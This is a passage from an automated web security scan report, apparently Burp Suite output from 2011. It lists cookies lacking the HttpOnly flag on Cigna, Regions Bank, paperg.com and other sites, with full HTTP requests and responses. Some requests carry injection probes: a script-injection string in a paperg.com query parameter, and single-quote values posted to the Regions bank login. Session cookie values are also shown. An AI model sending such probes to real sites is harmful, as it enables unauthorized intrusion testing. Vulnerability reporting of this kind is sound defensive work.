content-language: en-US
content-type: text/html
date: Mon, 16 May 2011 15:31:39 GMT
location: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayPasswordId.do
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 0
cache-control: no-cache,no-store,max-age=0
expires: Thu, 01 Jan 1970 00:00:00 GMT
pragma: No-cache
Set-Cookie: JSESSIONID=0000-q2wF_IgV38WKNH43KqfhRB:15eoj2var; Path=/
Set-Cookie: PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; Path=/
Content-Length: 0

8.3. https://cignaforhcp.cigna.com/wps/portal  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /wps/portal

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /wps/portal HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/
Cache-Control: max-age=0
Origin: https://cignaforhcp.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:31:34 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 20913
ibm-web2-location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_ozADAyM_0-BAg9BgYwNfQ_1wkA6zeAMcwNFA388jPzdVvyA7rxwABvDatQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID_CHCP=0001qDHqEZIhYEkdLt4C0F9Adey:1DE5MNIG9P; Path=/
Set-Cookie: PD_STATEFUL_31b6dc34-289d-11e0-8e97-2054895daa77=%2Fwps; Path=/
Content-Length: 20575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xmlns="http://www.w3.org/
...[SNIP]...
8.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Cui-Bytes: 1087
X-TeaLeaf-Page-Cui-Events: 2
X-TeaLeaf-Page-Dwell: 5810339
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: BeforeUnload
X-TeaLeaf-Page-Url: /web/public/guest
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; MYCIGNA_OEP_JSESSIONID=0000yQIxVsxIeGgNdda8oLY1ni2:15ntus9ve; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=C5A87FF47FD9107F08B6A536181C0CE6; __utmz=252045595.1305563482.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; __utma=252045595.1041628650.1305559758.1305559758.1305563482.2; __utmc=252045595; PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme
Content-Length: 266

<ClientEventSet PostTimeStamp="1305565653539" ><ClientEvent Count="2" Type="PERFORMANCE" SubType="BeforeUnload" MouseMove="False" Action="No Submit" TimeDuration="5810339" DateSince1970="1305565653539
...[SNIP]...

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 17:07:36 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000SfgkMCJXVtjzWixM8nxmOLM:15ntus9ve; Path=/
Set-Cookie: PD_STATEFUL_2af57d96-4b85-11e0-b595-20548963aa77=%2Fmycignatheme; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 266 bytes in 1ms.

</body>
</html>
8.5. https://my.cigna.com/web/public/forgotid  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /web/public/forgotid

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotid HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 18768
ibm-web2-location: /web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:24 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000swQewqb5KeLPS3KgAvdAzSA:15ngp48pp; Path=/
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 18773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
8.6. https://my.cigna.com/web/public/forgotpassword  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /web/public/forgotpassword

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotpassword HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:28 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 12125
ibm-web2-location: /web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:28 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000xdcAV8q-uIGQr0Dq1DrPDth:15ngp45tc; Path=/
Set-Cookie: PD_STATEFUL_d1425c42-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 12130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
8.7. https://securebank.regions.com/ForgottenPassword.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /ForgottenPassword.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForgottenPassword.aspx HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R851515607; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=sg41ptigwefyqt55op0wstbb; path=/
Vary: Accept-Encoding
Content-Length: 15873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
       <title>Regions Online Banking</title>
       <link href="styles/styles.
...[SNIP]...
8.8. https://securebank.regions.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login.aspx?brand=regions HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
Origin: https://www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 110

ignore=&locationZipCode=ZIP+Code&locationCity=City&locationState=State&googleSearch=&OnlineID=%27&Password=%27

Response

HTTP/1.1 301 Moved
Set-Cookie: securebank.regions.com-https=R812380214; path=/
Date: Mon, 16 May 2011 15:20:12 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
Set-Cookie: ASP.NET_SessionId=hndv2y55u1otew45h3eaarf0; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html
Content-Length: 0

8.9. https://sso.corp.cigna.com/corp/sso/professional/controller  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:39 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Set-cookie: JSESSIONID=0001aplKypDyIh3-IsriGvhcHmv:13agknsul; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Password - Enter User Name</title>
<link rel="ST
...[SNIP]...
8.10. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.paperg.com
Path:   /flyerboard/albany-times-union/1552/0.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flyerboard/albany-times-union/1552/0.html?bid=1552&pid=891&cid=0&view=all&boards%5B%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000050)%3C/script%3E HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:50:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=0ke9o5cho7nukfh3mrbgi89uo3; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 5506


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
8.11. https://www.paperg.com/forgot.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.paperg.com
Path:   /forgot.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgot.php HTTP/1.1
Host: www.paperg.com
Connection: keep-alive
Referer: http://www.paperg.com/publishers/flyerboard.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmb=27786045; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Set-Cookie: PHPSESSID=fq6c4o1f1f4ashphj9o9s9e8j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 3158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Con
...[SNIP]...
8.12. http://www.placelocal.com/forgot_password.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.placelocal.com
Path:   /forgot_password.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forgot_password.php HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/company.php

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:19:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Set-Cookie: PHPSESSID=3oik1g2sp46e2tucskv23ggv70; expires=Thu, 03-Oct-2052 06:39:20 GMT; path=/; domain=.placelocal.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Vary: Accept-Encoding
Content-Length: 6267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
8.13. https://www.planservices.com/regions/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.planservices.com
Path:   /regions/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /regions/ HTTP/1.1
Host: www.planservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: 01 Nov 1990 01:00:01 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p.xml
Set-Cookie: TESTCOOKIES=Test;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFID=52158672;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFTOKEN=42630575;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: JSESSIONID=0430e8dac9c0442b7260TR;path=/
Set-Cookie: PLANID=;path=/
Set-Cookie: GROUPID=;path=/
Set-Cookie: IID=;path=/
Set-Cookie: WEBUSAGE=124614;path=/
Set-Cookie: USERINTERNAL=0;path=/
Set-Cookie: VIRTDIR=regions;path=/
Date: Mon, 16 May 2011 16:46:14 GMT
Connection: close


<script type="text/javascript" language="javascript">
   var str="launch,Bisys_TopFrame.cfm"; //string value to designate calls
   var urlLocation = self.location.href.toLowerCase(); //string valu
...[SNIP]...
8.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://wwwa.applyonlinenow.com
Path:   /USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/entry?directMail=true&sc=UAASWI HTTP/1.1
Host: wwwa.applyonlinenow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 15:28:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://wwwa.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000wkGjL9NUQ6om08aGILL54g2:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US

8.15. http://ads.bridgetrack.com/site/rtgt.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /site/rtgt.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/rtgt.asp?BU=167&ref=http%3A//www.regions.com/personal_banking/email_starting_net.rf&p=http%3A//www.regions.com/personal_banking/loans_credit.rf&r=0.049829987809062004 HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.regions.com/personal_banking/loans_credit.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTASES=SID=56027293DC7140588B495E696083C1E4; BTA167=; BTA=GUID=05443B076F794FD18F0B4B508B843066

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 15 May 2011 15:17:16 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTA=GUID=05443B076F794FD18F0B4B508B843066; expires=Thu, 10-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTA167=; expires=Thu, 10-May-2012 04:00:00 GMT; path=/
Set-Cookie: BTASES=SID=56027293DC7140588B495E696083C1E4; path=/
Date: Mon, 16 May 2011 15:17:15 GMT
Connection: close
Content-Length: 0

8.16. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4dd159eaa044675c&callback=_ate.ad.hrr&pub=xa-4cd989666c0edf81&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.xsnet.com%2F&11g3bcg HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=2; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1305283016.60|1305283016.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 16 May 2011 17:08:13 GMT
Set-Cookie: di=1305283016.1FE|1305283016.60; Domain=.addthis.com; Expires=Wed, 15-May-2013 17:08:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 15-Jun-2011 17:08:13 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Mon, 16 May 2011 17:08:12 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
8.17. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
